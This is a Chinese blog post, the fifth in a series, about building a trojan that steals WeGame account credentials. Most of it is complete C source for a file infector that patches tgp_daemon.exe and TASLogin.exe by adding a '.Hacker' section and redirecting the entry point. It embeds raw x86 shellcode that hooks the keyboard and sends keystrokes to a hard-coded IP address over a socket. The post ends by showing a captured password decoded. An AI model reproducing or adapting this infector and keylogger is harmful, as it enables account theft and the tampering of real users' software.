盗号木马之旅(五)
目标:
实现把我们在 WeGame盗号木马之旅(三) 中实现的机器码注入到目标EXE中,并修改相关结构。即完成InfectiveVirus.exe。
实现:
下面上一张图,形象的解释我们怎么感染目标EXE:
首先我们打开目标EXE,CreateFile,读到内存。
然后在内存修改相关PE结构参数和注入代码:
最后写回覆盖原来的EXE即可:
打开和写回很简单,就是一般的文件操作而已。关键在于怎么修改PE结构。具体细节请读者参考这几篇文章(http://www.cnblogs.com/wumac/p/5272846.html)(https://www.cnblogs.com/wumac/p/5274559.html)。读者需要有相关PE结构知识才行。下面简单说明一下我们需要改什么:
一、新建一个节,我把他取名.Hacker,同时设置一下里面的一些数据
二、修改PE头中节的数量
三、修改ImageSize大小,即PE文件加到内存以后的大小
四、修改入口点地址
五、尾部开辟0X2000大小的空间放机器码和参数
下面上代码:
#define WIN32_LEAN_AND_MEAN
#include<windows.h>
#include<tchar.h>
#include<stdio.h>
#include<Winsock2.h>
#pragma comment(lib,"WS2_32.lib")
char cBuffer[48] = { 0 };//0
char* pUser32 = "C:\\Windows\\System32\\user32.dll";//30
char* pWS2_32 = "C:\\Windows\\System32\\Ws2_32.dll";//60
char* pLoadLibrary = "LoadLibraryA";//90
char* pGetProcAddress = "GetProcAddress";//C0
char* pGetCurrentThreadId = "GetCurrentThreadId";//F0
char* pSetWindowsHookEx = "SetWindowsHookExA";//120
char* pCreateThread = "CreateThread";//150
char* pCallNextHookEx = "CallNextHookEx";//180
char* pWSAStartup = "WSAStartup";//1B0
char* psocket = "socket";//1E0
char* phtons = "htons";//210
char* pIP = "192.168.1.3";//240
char* pinet_addr = "inet_addr";//270
char* pconnect = "connect";//2A0
char* psend = "send";//2D0
char* pclosesocket = "closesocket";//300
char* pWSACleanup = "WSACleanup";//330
int iNamesNum;//360
HHOOK gHook;//364
PBYTE pKernalBaseMem = NULL;//368
HANDLE hUser32Handle = NULL;//36C
HANDLE hWS2_32Handle = NULL;//370
WORD* pNameOrdinalsTable;//374
DWORD* pAddressOfName;//378
DWORD* pAddressOfFunction;//37C
DWORD dwLoadLibrary = NULL;//380
DWORD dwGetProcAddress = NULL;//384
PROC procGetCurrentThreadId = NULL;//388
PROC procSetWindowsHookEx = NULL;//38C
PROC procCreateThread = NULL;//390
PROC procCallNextHookEx = NULL;//394
PROC procWSAStartup = NULL;//398
PROC procsocket = NULL;//39C
PROC prochtons = NULL;//3A0
PROC procinet_addr = NULL;//3A4
PROC procconnect = NULL;//3A8
PROC procsend = NULL;//3AC
PROC procclosesocket = NULL;//3B0
PROC procWSACleanup = NULL;//3B4
//////////////
WCHAR pLinkName[] = L"\\\\.\\*_LINK";//3B8
char pCreateFile[] = "CreateFileW";//3E8
char pDeviceIoControl[] = "DeviceIoControl";//418
PROC procCreateFile = NULL;//448
PROC procDeviceIoControl = NULL;//44C
int temp;//450
//注入代码(tgp_daemon.exe)
char shellcode[] = {
0x64,0x8B,0x05,0x30,0x00,0x00,0x00,0x8B,0x40,0x0C,0x8B,0x40,0x0C,0x8B,0x00,0x8B,
0x00,0x8B,0x40,0x18,0x89,0x05,0x68,0x13,0x57,0x00,0x8B,0x40,0x3C,0x8B,0x1D,0x68,
0x13,0x57,0x00,0x03,0xC3,0x03,0x58,0x78,0x8B,0x43,0x14,0x89,0x05,0x60,0x13,0x57,
0x00,0x8B,0x0D,0x68,0x13,0x57,0x00,0x03,0x4B,0x24,0x89,0x0D,0x74,0x13,0x57,0x00,
0x8B,0x0D,0x68,0x13,0x57,0x00,0x03,0x4B,0x20,0x89,0x0D,0x78,0x13,0x57,0x00,0x8B,
0x0D,0x68,0x13,0x57,0x00,0x03,0x4B,0x1C,0x89,0x0D,0x7C,0x13,0x57,0x00,0x56,0x57,
0xC7,0xC2,0x00,0x00,0x00,0x00,0x8B,0x3D,0x78,0x13,0x57,0x00,0x8B,0x35,0x68,0x13,
0x57,0x00,0x03,0x34,0x97,0xC7,0xC7,0x90,0x10,0x57,0x00,0xC7,0xC3,0x00,0x00,0x00,
0x00,0xC7,0xC1,0x00,0x00,0x00,0x00,0x8A,0x24,0x33,0x8A,0x04,0x3B,0x3A,0xE0,0x75,
0x29,0x43,0x83,0xFB,0x0D,0x0F,0x85,0xEC,0xFF,0xFF,0xFF,0x8B,0x0D,0x74,0x13,0x57,
0x00,0x0F,0xB7,0x0C,0x51,0x8B,0x3D,0x7C,0x13,0x57,0x00,0x8B,0x3C,0x8F,0x89,0x3D,
0x80,0x13,0x57,0x00,0xC7,0xC1,0x00,0x00,0x00,0x00,0xC7,0xC7,0xC0,0x10,0x57,0x00,
0x8A,0x24,0x31,0x8A,0x04,0x39,0x3A,0xE0,0x75,0x23,0x41,0x83,0xF9,0x0E,0x0F,0x85,
0xE6,0xFF,0xFF,0xFF,0x8B,0x35,0x74,0x13,0x57,0x00,0x0F,0xB7,0x34,0x56,0x8B,0x3D,
0x7C,0x13,0x57,0x00,0x8B,0x3C,0xB7,0x89,0x3D,0x84,0x13,0x57,0x00,0x8B,0x05,0x80,
0x13,0x57,0x00,0x83,0xF8,0x00,0x74,0x0D,0x8B,0x05,0x84,0x13,0x57,0x00,0x83,0xF8,
0x00,0x74,0x02,0xEB,0x0D,0x42,0x3B,0x15,0x60,0x13,0x57,0x00,0x0F,0x85,0x54,0xFF,
0xFF,0xFF,0x5F,0x5E,0x8B,0x05,0x68,0x13,0x57,0x00,0x8B,0x1D,0x80,0x13,0x57,0x00,
0x03,0xD8,0x89,0x1D,0x80,0x13,0x57,0x00,0x8B,0x1D,0x84,0x13,0x57,0x00,0x03,0xD8,
0x89,0x1D,0x84,0x13,0x57,0x00,0x68,0x30,0x10,0x57,0x00,0xFF,0x15,0x80,0x13,0x57,
0x00,0x89,0x05,0x6C,0x13,0x57,0x00,0x68,0x60,0x10,0x57,0x00,0xFF,0x15,0x80,0x13,
0x57,0x00,0x89,0x05,0x70,0x13,0x57,0x00,0x68,0xF0,0x10,0x57,0x00,0xFF,0x35,0x68,
0x13,0x57,0x00,0xFF,0x15,0x84,0x13,0x57,0x00,0x89,0x05,0x88,0x13,0x57,0x00,0x68,
0x20,0x11,0x57,0x00,0xFF,0x35,0x6C,0x13,0x57,0x00,0xFF,0x15,0x84,0x13,0x57,0x00,
0x89,0x05,0x8C,0x13,0x57,0x00,0x68,0x50,0x11,0x57,0x00,0xFF,0x35,0x68,0x13,0x57,
0x00,0xFF,0x15,0x84,0x13,0x57,0x00,0x89,0x05,0x90,0x13,0x57,0x00,0x68,0x80,0x11,
0x57,0x00,0xFF,0x35,0x6C,0x13,0x57,0x00,0xFF,0x15,0x84,0x13,0x57,0x00,0x89,0x05,
0x94,0x13,0x57,0x00,0x68,0xB0,0x11,0x57,0x00,0xFF,0x35,0x70,0x13,0x57,0x00,0xFF,
0x15,0x84,0x13,0x57,0x00,0x89,0x05,0x98,0x13,0x57,0x00,0x68,0xE0,0x11,0x57,0x00,
0xFF,0x35,0x70,0x13,0x57,0x00,0xFF,0x15,0x84,0x13,0x57,0x00,0x89,0x05,0x9C,0x13,
0x57,0x00,0x68,0x10,0x12,0x57,0x00,0xFF,0x35,0x70,0x13,0x57,0x00,0xFF,0x15,0x84,
0x13,0x57,0x00,0x89,0x05,0xA0,0x13,0x57,0x00,0x68,0x70,0x12,0x57,0x00,0xFF,0x35,
0x70,0x13,0x57,0x00,0xFF,0x15,0x84,0x13,0x57,0x00,0x89,0x05,0xA4,0x13,0x57,0x00,
0x68,0xA0,0x12,0x57,0x00,0xFF,0x35,0x70,0x13,0x57,0x00,0xFF,0x15,0x84,0x13,0x57,
0x00,0x89,0x05,0xA8,0x13,0x57,0x00,0x68,0xD0,0x12,0x57,0x00,0xFF,0x35,0x70,0x13,
0x57,0x00,0xFF,0x15,0x84,0x13,0x57,0x00,0x89,0x05,0xAC,0x13,0x57,0x00,0x68,0x00,
0x13,0x57,0x00,0xFF,0x35,0x70,0x13,0x57,0x00,0xFF,0x15,0x84,0x13,0x57,0x00,0x89,
0x05,0xB0,0x13,0x57,0x00,0x68,0x30,0x13,0x57,0x00,0xFF,0x35,0x70,0x13,0x57,0x00,
0xFF,0x15,0x84,0x13,0x57,0x00,0x89,0x05,0xB4,0x13,0x57,0x00,0xFF,0x15,0x88,0x13,
0x57,0x00,0x50,0x6A,0x00,0x68,0x00,0x03,0x57,0x00,0x6A,0x03,0xFF,0x15,0x8C,0x13,
0x57,0x00,0xE9,0x21,0xAA,0xF0,0xFF,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x55,0x8B,0xEC,0x81,0xEC,0xC0,0x00,0x00,0x00,0x53,0x56,0x57,0x8D,0xBD,0x40,0xFF,
0xFF,0xFF,0xC7,0xC1,0x30,0x00,0x00,0x00,0xC7,0xC0,0xCC,0xCC,0xCC,0xCC,0xF3,0xAB,
0x8B,0x45,0x10,0x8B,0x58,0x04,0x81,0xFB,0x02,0x01,0x00,0x00,0x75,0x23,0x8A,0x40,
0x08,0x88,0x05,0x00,0x10,0x57,0x00,0x6A,0x00,0x6A,0x00,0x8D,0x05,0x00,0x10,0x57,
0x00,0x50,0x68,0xC0,0x03,0x57,0x00,0x6A,0x00,0x6A,0x00,0xFF,0x15,0x90,0x13,0x57,
0x00,0xFF,0x75,0x10,0xFF,0x75,0x0C,0xFF,0x75,0x08,0xFF,0x35,0x64,0x13,0x57,0x00,
0xFF,0x15,0x94,0x13,0x57,0x00,0x5F,0x5E,0x5B,0x8B,0xE5,0x5D,0xC2,0x0C,0x00,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x55,0x8B,0xEC,0x83,0xEC,0x40,0x53,0x56,0x57,0x8D,0x85,0x30,0xFE,0xFF,0xFF,0x50,
0x68,0x02,0x02,0x00,0x00,0xFF,0x15,0x98,0x13,0x57,0x00,0x6A,0x00,0x6A,0x01,0x6A,
0x02,0xFF,0x15,0x9C,0x13,0x57,0x00,0x89,0x45,0xF8,0xC7,0xC0,0x02,0x00,0x00,0x00,
0x66,0x89,0x45,0xE0,0x68,0x0A,0x1A,0x00,0x00,0xFF,0x15,0xA0,0x13,0x57,0x00,0x66,
0x89,0x45,0xE2,0x68,0x40,0x12,0x57,0x00,0xFF,0x15,0xA4,0x13,0x57,0x00,0x89,0x45,
0xE4,0x6A,0x10,0x8D,0x45,0xE0,0x50,0x8B,0x45,0xF8,0x50,0xFF,0x15,0xA8,0x13,0x57,
0x00,0x83,0xF8,0x00,0x75,0x11,0x6A,0x00,0x6A,0x01,0xFF,0x75,0x08,0x8B,0x45,0xF8,
0x50,0xFF,0x15,0xAC,0x13,0x57,0x00,0x8B,0x45,0xF8,0x50,0xFF,0x15,0xB0,0x13,0x57,
0x00,0xFF,0x15,0xB4,0x13,0x57,0x00,0x5F,0x5E,0x5B,0x8B,0xE5,0x5D,0xC2,0x04,0x00
};
//注入代码(TASLogin.exe)
char shellcode2[] = {
0x64,0x8B,0x05,0x30,0x00,0x00,0x00,0x8B,0x40,0x0C,0x8B,0x40,0x0C,0x8B,0x00,0x8B,
0x00,0x8B,0x40,0x18,0x89,0x05,0x68,0x13,0x4F,0x00,0x8B,0x40,0x3C,0x8B,0x1D,0x68,
0x13,0x4F,0x00,0x03,0xC3,0x03,0x58,0x78,0x8B,0x43,0x14,0x89,0x05,0x60,0x13,0x4F,
0x00,0x8B,0x0D,0x68,0x13,0x4F,0x00,0x03,0x4B,0x24,0x89,0x0D,0x74,0x13,0x4F,0x00,
0x8B,0x0D,0x68,0x13,0x4F,0x00,0x03,0x4B,0x20,0x89,0x0D,0x78,0x13,0x4F,0x00,0x8B,
0x0D,0x68,0x13,0x4F,0x00,0x03,0x4B,0x1C,0x89,0x0D,0x7C,0x13,0x4F,0x00,0x56,0x57,
0xC7,0xC2,0x00,0x00,0x00,0x00,0x8B,0x3D,0x78,0x13,0x4F,0x00,0x8B,0x35,0x68,0x13,
0x4F,0x00,0x03,0x34,0x97,0xC7,0xC7,0x90,0x10,0x4F,0x00,0xC7,0xC3,0x00,0x00,0x00,
0x00,0xC7,0xC1,0x00,0x00,0x00,0x00,0x8A,0x24,0x33,0x8A,0x04,0x3B,0x3A,0xE0,0x75,
0x29,0x43,0x83,0xFB,0x0D,0x0F,0x85,0xEC,0xFF,0xFF,0xFF,0x8B,0x0D,0x74,0x13,0x4F,
0x00,0x0F,0xB7,0x0C,0x51,0x8B,0x3D,0x7C,0x13,0x4F,0x00,0x8B,0x3C,0x8F,0x89,0x3D,
0x80,0x13,0x4F,0x00,0xC7,0xC1,0x00,0x00,0x00,0x00,0xC7,0xC7,0xC0,0x10,0x4F,0x00,
0x8A,0x24,0x31,0x8A,0x04,0x39,0x3A,0xE0,0x75,0x23,0x41,0x83,0xF9,0x0E,0x0F,0x85,
0xE6,0xFF,0xFF,0xFF,0x8B,0x35,0x74,0x13,0x4F,0x00,0x0F,0xB7,0x34,0x56,0x8B,0x3D,
0x7C,0x13,0x4F,0x00,0x8B,0x3C,0xB7,0x89,0x3D,0x84,0x13,0x4F,0x00,0x8B,0x05,0x80,
0x13,0x4F,0x00,0x83,0xF8,0x00,0x74,0x0D,0x8B,0x05,0x84,0x13,0x4F,0x00,0x83,0xF8,
0x00,0x74,0x02,0xEB,0x0D,0x42,0x3B,0x15,0x60,0x13,0x4F,0x00,0x0F,0x85,0x54,0xFF,
0xFF,0xFF,0x5F,0x5E,0x8B,0x05,0x68,0x13,0x4F,0x00,0x8B,0x1D,0x80,0x13,0x4F,0x00,
0x03,0xD8,0x89,0x1D,0x80,0x13,0x4F,0x00,0x8B,0x1D,0x84,0x13,0x4F,0x00,0x03,0xD8,
0x89,0x1D,0x84,0x13,0x4F,0x00,0x68,0x30,0x10,0x4F,0x00,0xFF,0x15,0x80,0x13,0x4F,
0x00,0x89,0x05,0x6C,0x13,0x4F,0x00,0x68,0x60,0x10,0x4F,0x00,0xFF,0x15,0x80,0x13,
0x4F,0x00,0x89,0x05,0x70,0x13,0x4F,0x00,0x68,0xF0,0x10,0x4F,0x00,0xFF,0x35,0x68,
0x13,0x4F,0x00,0xFF,0x15,0x84,0x13,0x4F,0x00,0x89,0x05,0x88,0x13,0x4F,0x00,0x68,
0x20,0x11,0x4F,0x00,0xFF,0x35,0x6C,0x13,0x4F,0x00,0xFF,0x15,0x84,0x13,0x4F,0x00,
0x89,0x05,0x8C,0x13,0x4F,0x00,0x68,0x50,0x11,0x4F,0x00,0xFF,0x35,0x68,0x13,0x4F,
0x00,0xFF,0x15,0x84,0x13,0x4F,0x00,0x89,0x05,0x90,0x13,0x4F,0x00,0x68,0x80,0x11,
0x4F,0x00,0xFF,0x35,0x6C,0x13,0x4F,0x00,0xFF,0x15,0x84,0x13,0x4F,0x00,0x89,0x05,
0x94,0x13,0x4F,0x00,0x68,0xB0,0x11,0x4F,0x00,0xFF,0x35,0x70,0x13,0x4F,0x00,0xFF,
0x15,0x84,0x13,0x4F,0x00,0x89,0x05,0x98,0x13,0x4F,0x00,0x68,0xE0,0x11,0x4F,0x00,
0xFF,0x35,0x70,0x13,0x4F,0x00,0xFF,0x15,0x84,0x13,0x4F,0x00,0x89,0x05,0x9C,0x13,
0x4F,0x00,0x68,0x10,0x12,0x4F,0x00,0xFF,0x35,0x70,0x13,0x4F,0x00,0xFF,0x15,0x84,
0x13,0x4F,0x00,0x89,0x05,0xA0,0x13,0x4F,0x00,0x68,0x70,0x12,0x4F,0x00,0xFF,0x35,
0x70,0x13,0x4F,0x00,0xFF,0x15,0x84,0x13,0x4F,0x00,0x89,0x05,0xA4,0x13,0x4F,0x00,
0x68,0xA0,0x12,0x4F,0x00,0xFF,0x35,0x70,0x13,0x4F,0x00,0xFF,0x15,0x84,0x13,0x4F,
0x00,0x89,0x05,0xA8,0x13,0x4F,0x00,0x68,0xD0,0x12,0x4F,0x00,0xFF,0x35,0x70,0x13,
0x4F,0x00,0xFF,0x15,0x84,0x13,0x4F,0x00,0x89,0x05,0xAC,0x13,0x4F,0x00,0x68,0x00,
0x13,0x4F,0x00,0xFF,0x35,0x70,0x13,0x4F,0x00,0xFF,0x15,0x84,0x13,0x4F,0x00,0x89,
0x05,0xB0,0x13,0x4F,0x00,0x68,0x30,0x13,0x4F,0x00,0xFF,0x35,0x70,0x13,0x4F,0x00,
0xFF,0x15,0x84,0x13,0x4F,0x00,0x89,0x05,0xB4,0x13,0x4F,0x00,0x68,0xE8,0x13,0x4F,
0x00,0xFF,0x35,0x68,0x13,0x4F,0x00,0xFF,0x15,0x84,0x13,0x4F,0x00,0x89,0x05,0x48,
0x14,0x4F,0x00,0x68,0x18,0x14,0x4F,0x00,0xFF,0x35,0x68,0x13,0x4F,0x00,0xFF,0x15,
0x84,0x13,0x4F,0x00,0x89,0x05,0x4C,0x14,0x4F,0x00,0xFF,0x15,0x88,0x13,0x4F,0x00,
0x50,0x6A,0x00,0x68,0x00,0x03,0x4F,0x00,0x6A,0x03,0xFF,0x15,0x8C,0x13,0x4F,0x00,
0x89,0x05,0x64,0x13,0x4F,0x00,0x6A,0x00,0x6A,0x00,0x6A,0x00,0x68,0x80,0x04,0x4F,
0x00,0x6A,0x00,0x6A,0x00,0xFF,0x15,0x90,0x13,0x4F,0x00,0xE9,0x78,0xFE,0xF2,0xFF,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x55,0x8B,0xEC,0x81,0xEC,0xC0,0x00,0x00,0x00,0x53,0x56,0x57,0x8D,0xBD,0x40,0xFF,
0xFF,0xFF,0xC7,0xC1,0x30,0x00,0x00,0x00,0xC7,0xC0,0xCC,0xCC,0xCC,0xCC,0xF3,0xAB,
0x8B,0x45,0x10,0x8B,0x58,0x04,0x81,0xFB,0x02,0x01,0x00,0x00,0x75,0x23,0x8A,0x40,
0x08,0x88,0x05,0x00,0x10,0x4F,0x00,0x6A,0x00,0x6A,0x00,0x8D,0x05,0x00,0x10,0x4F,
0x00,0x50,0x68,0xC0,0x03,0x4F,0x00,0x6A,0x00,0x6A,0x00,0xFF,0x15,0x90,0x13,0x4F,
0x00,0x8B,0x45,0x10,0x8B,0x58,0x04,0x81,0xFB,0x01,0x02,0x00,0x00,0x75,0x15,0x6A,
0x00,0x6A,0x00,0x6A,0x00,0x68,0x80,0x04,0x4F,0x00,0x6A,0x00,0x6A,0x00,0xFF,0x15,
0x90,0x13,0x4F,0x00,0xFF,0x75,0x10,0xFF,0x75,0x0C,0xFF,0x75,0x08,0xFF,0x35,0x64,
0x13,0x4F,0x00,0xFF,0x15,0x94,0x13,0x4F,0x00,0x5F,0x5E,0x5B,0x8B,0xE5,0x5D,0xC2,
0x0C,0x00,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x55,0x8B,0xEC,0x83,0xEC,0x40,0x53,0x56,0x57,0x8D,0x85,0x30,0xFE,0xFF,0xFF,0x50,
0x68,0x02,0x02,0x00,0x00,0xFF,0x15,0x98,0x13,0x4F,0x00,0x6A,0x00,0x6A,0x01,0x6A,
0x02,0xFF,0x15,0x9C,0x13,0x4F,0x00,0x89,0x45,0xF8,0xC7,0xC0,0x02,0x00,0x00,0x00,
0x66,0x89,0x45,0xE0,0x68,0x0B,0x1A,0x00,0x00,0xFF,0x15,0xA0,0x13,0x4F,0x00,0x66,
0x89,0x45,0xE2,0x68,0x40,0x12,0x4F,0x00,0xFF,0x15,0xA4,0x13,0x4F,0x00,0x89,0x45,
0xE4,0x6A,0x10,0x8D,0x45,0xE0,0x50,0x8B,0x45,0xF8,0x50,0xFF,0x15,0xA8,0x13,0x4F,
0x00,0x83,0xF8,0x00,0x75,0x11,0x6A,0x00,0x6A,0x01,0xFF,0x75,0x08,0x8B,0x45,0xF8,
0x50,0xFF,0x15,0xAC,0x13,0x4F,0x00,0x8B,0x45,0xF8,0x50,0xFF,0x15,0xB0,0x13,0x4F,
0x00,0xFF,0x15,0xB4,0x13,0x4F,0x00,0x5F,0x5E,0x5B,0x8B,0xE5,0x5D,0xC2,0x04,0x00,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x55,0x8B,0xEC,0x81,0xEC,0xC0,0x00,0x00,0x00,0x53,0x56,0x57,0x6A,0x00,0x68,0x80,
0x00,0x00,0x00,0x6A,0x03,0x6A,0x00,0x6A,0x03,0x68,0x00,0x00,0x00,0xC0,0x68,0xB8,
0x13,0x4F,0x00,0xFF,0x15,0x48,0x14,0x4F,0x00,0x6A,0x00,0x68,0x54,0x14,0x4F,0x00,
0x6A,0x00,0x6A,0x00,0x6A,0x00,0x6A,0x00,0x6A,0x00,0x50,0xFF,0x15,0x4C,0x14,0x4F,
0x00,0x5F,0x5E,0x5B,0x8B,0xE5,0x5D,0xC2,0x04,0x00,0x90,0x90,0x90,0x90,0x90,0x90
};
typedef struct RemoteParameter
{
char c[18][48];
DWORD p[22];
char cc[3][48];
DWORD pp[3];
};
void main() {
TCHAR* fileName[2];
fileName[0] = _T("F:\\WeGame\\tgp_daemon.exe");
fileName[1] = _T("F:\\WeGame\\tenprotect\\TASLogin.exe");
//fileName[0] = _T("C:\\Users\\a\\Desktop\\WeGame\\tgp_daemon.exe");
//fileName[1] = _T("C:\\Users\\a\\Desktop\\WeGame\\tenprotect\\TASLogin.exe");
for (int i = 0; i < 2; i++) {
DWORD dwApplySize = 0x2000;//需要开辟的代码和参数空间大小
HANDLE hFile = CreateFile(fileName[i], GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ, NULL, OPEN_EXISTING, NULL, 0);
if (hFile == INVALID_HANDLE_VALUE || hFile == NULL) {
printf("无法打开文件!");
return;
}
DWORD dwFileSize = GetFileSize(hFile, NULL);
if (dwFileSize == 0xffffffff) {
printf("读取文件大小失败!");
CloseHandle(hFile);
return;
}
LPVOID pFileMem = GlobalAlloc(GMEM_FIXED | GMEM_ZEROINIT, dwFileSize + dwApplySize);//开辟新的内存
if (pFileMem == NULL) {
printf("开辟内存失败!");
CloseHandle(hFile);
return;
}
DWORD dwReadFactSize = 0;
BOOL bRead = ReadFile(hFile, pFileMem, dwFileSize, &dwReadFactSize, NULL);
if (!bRead || dwReadFactSize != dwFileSize) {
printf("文件载入内存出错!");
CloseHandle(hFile);
GlobalFree(pFileMem);
return;
}
//设置新的节
PIMAGE_NT_HEADERS pPeHeader = (PIMAGE_NT_HEADERS)((PBYTE)pFileMem + ((PIMAGE_DOS_HEADER)pFileMem)->e_lfanew);
PIMAGE_SECTION_HEADER pSectionHeader = (PIMAGE_SECTION_HEADER)((PBYTE)&pPeHeader->OptionalHeader + pPeHeader->FileHeader.SizeOfOptionalHeader);
int iSectionNum = pPeHeader->FileHeader.NumberOfSections;//原来的节数目
IMAGE_SECTION_HEADER addSectionHeader;//新的节
addSectionHeader.Name[0] = '.';
addSectionHeader.Name[1] = 'H';
addSectionHeader.Name[2] = 'a';
addSectionHeader.Name[3] = 'c';
addSectionHeader.Name[4] = 'k';
addSectionHeader.Name[5] = 'e';
addSectionHeader.Name[6] = 'r';
addSectionHeader.Name[7] = '\0';//设置节的名字
addSectionHeader.Misc.VirtualSize = dwApplySize;//节的虚拟内存大小
addSectionHeader.VirtualAddress = pPeHeader->OptionalHeader.SizeOfImage;//虚拟地址起点
addSectionHeader.SizeOfRawData = dwApplySize;//节的文件内大小
addSectionHeader.PointerToRawData = pSectionHeader[iSectionNum - 1].PointerToRawData + pSectionHeader[iSectionNum - 1].SizeOfRawData;//文件地址起点
addSectionHeader.PointerToRelocations = 0;//这些参数不重要
addSectionHeader.PointerToLinenumbers = 0;
addSectionHeader.NumberOfRelocations = 0;
addSectionHeader.PointerToLinenumbers = 0;
addSectionHeader.Characteristics = 0xF000000F;//设置这片内存的属性,需要有执行代码和读写的权限才行
memcpy((PBYTE)(&pSectionHeader[iSectionNum - 1]) + sizeof(IMAGE_SECTION_HEADER), (PBYTE)&addSectionHeader, sizeof(IMAGE_SECTION_HEADER));
pPeHeader->FileHeader.NumberOfSections++;//增加节的数目
pPeHeader->OptionalHeader.DllCharacteristics = 0x0000;
pPeHeader->OptionalHeader.AddressOfEntryPoint = pPeHeader->OptionalHeader.SizeOfImage;//设置新的入口点
pPeHeader->OptionalHeader.SizeOfImage += 0x2000;//增加总的内存文件大小0x2000
//初始化参数,参数即需要在我们代码里面使用的一些字符串和用来保存的变量
struct RemoteParameter remoteParameter;
memset(&remoteParameter, 0, sizeof(remoteParameter));
memcpy(remoteParameter.c[1], pUser32, strlen(pUser32));
memcpy(remoteParameter.c[2], pWS2_32, strlen(pWS2_32));
memcpy(remoteParameter.c[3], pLoadLibrary, strlen(pLoadLibrary));
memcpy(remoteParameter.c[4], pGetProcAddress, strlen(pGetProcAddress));
memcpy(remoteParameter.c[5], pGetCurrentThreadId, strlen(pGetCurrentThreadId));
memcpy(remoteParameter.c[6], pSetWindowsHookEx, strlen(pSetWindowsHookEx));
memcpy(remoteParameter.c[7], pCreateThread, strlen(pCreateThread));
memcpy(remoteParameter.c[8], pCallNextHookEx, strlen(pCallNextHookEx));
memcpy(remoteParameter.c[9], pWSAStartup, strlen(pWSAStartup));
memcpy(remoteParameter.c[10], psocket, strlen(psocket));
memcpy(remoteParameter.c[11], phtons, strlen(phtons));
memcpy(remoteParameter.c[12], pIP, strlen(pIP));
memcpy(remoteParameter.c[13], pinet_addr, strlen(pinet_addr));
memcpy(remoteParameter.c[14], pconnect, strlen(pconnect));
memcpy(remoteParameter.c[15], psend, strlen(psend));
memcpy(remoteParameter.c[16], pclosesocket, strlen(pclosesocket));
memcpy(remoteParameter.c[17], pWSACleanup, strlen(pWSACleanup));
memcpy(remoteParameter.cc[0], pLinkName, sizeof(pLinkName));
memcpy(remoteParameter.cc[1], pCreateFile, sizeof(pCreateFile));
memcpy(remoteParameter.cc[2], pDeviceIoControl, sizeof(pDeviceIoControl));
//把参数结构体写入目标EXE文件
memcpy((PBYTE)pFileMem + addSectionHeader.PointerToRawData + 0x1000, (PBYTE)&remoteParameter, sizeof(remoteParameter));
//把注入的机器码(注入代码)写入目标EXE
if (i == 0) {
memcpy((PBYTE)pFileMem + addSectionHeader.PointerToRawData, shellcode, sizeof(shellcode));//注入到tgp_daemon.exe
}
else
{
memcpy((PBYTE)pFileMem + addSectionHeader.PointerToRawData, shellcode2, sizeof(shellcode2));//注入到TASLogin.exe
}
//生成感染的程序,把修改后的文件从内存中取出写入原来文件地址,覆盖原来目标EXE文件
DWORD dwWriteFact = 0;
DWORD dwPointer = SetFilePointer(hFile, 0, NULL, FILE_BEGIN);
if (dwPointer == 0xffffffff) {
printf("文件指针移到头出错!");
CloseHandle(hFile);
GlobalFree(pFileMem);
return;
}
BOOL bRet = WriteFile(hFile, pFileMem, dwFileSize + dwApplySize, &dwWriteFact, NULL);
if (!bRet || dwWriteFact != dwFileSize + dwApplySize) {
printf("写出出错!");
}
CloseHandle(hFile);
GlobalFree(pFileMem);
if (i == 0) {
printf("感染tgp_daemon.exe成功!\n");
}
else
{
printf("感染TASLogin.exe成功!\n");
}
}
system("pause");
}
最终运行效果图:
上面3个是驱动文件,中间又边是病毒EXE,中间左边是WeGame。
这两个是接收账号和密码的EXE。
上面是安装的驱动。
感染效果图。
我输入的密码是0987654321,密码本是通过模拟按键1234567890获得的。可以看到模拟1234567890获得的对应关系是5341726890。接下来我捕获的未解密密码是0986271435,对照密码本翻译显然就是我的输入密码0987654321.O(∩_∩)O!!!
结语:
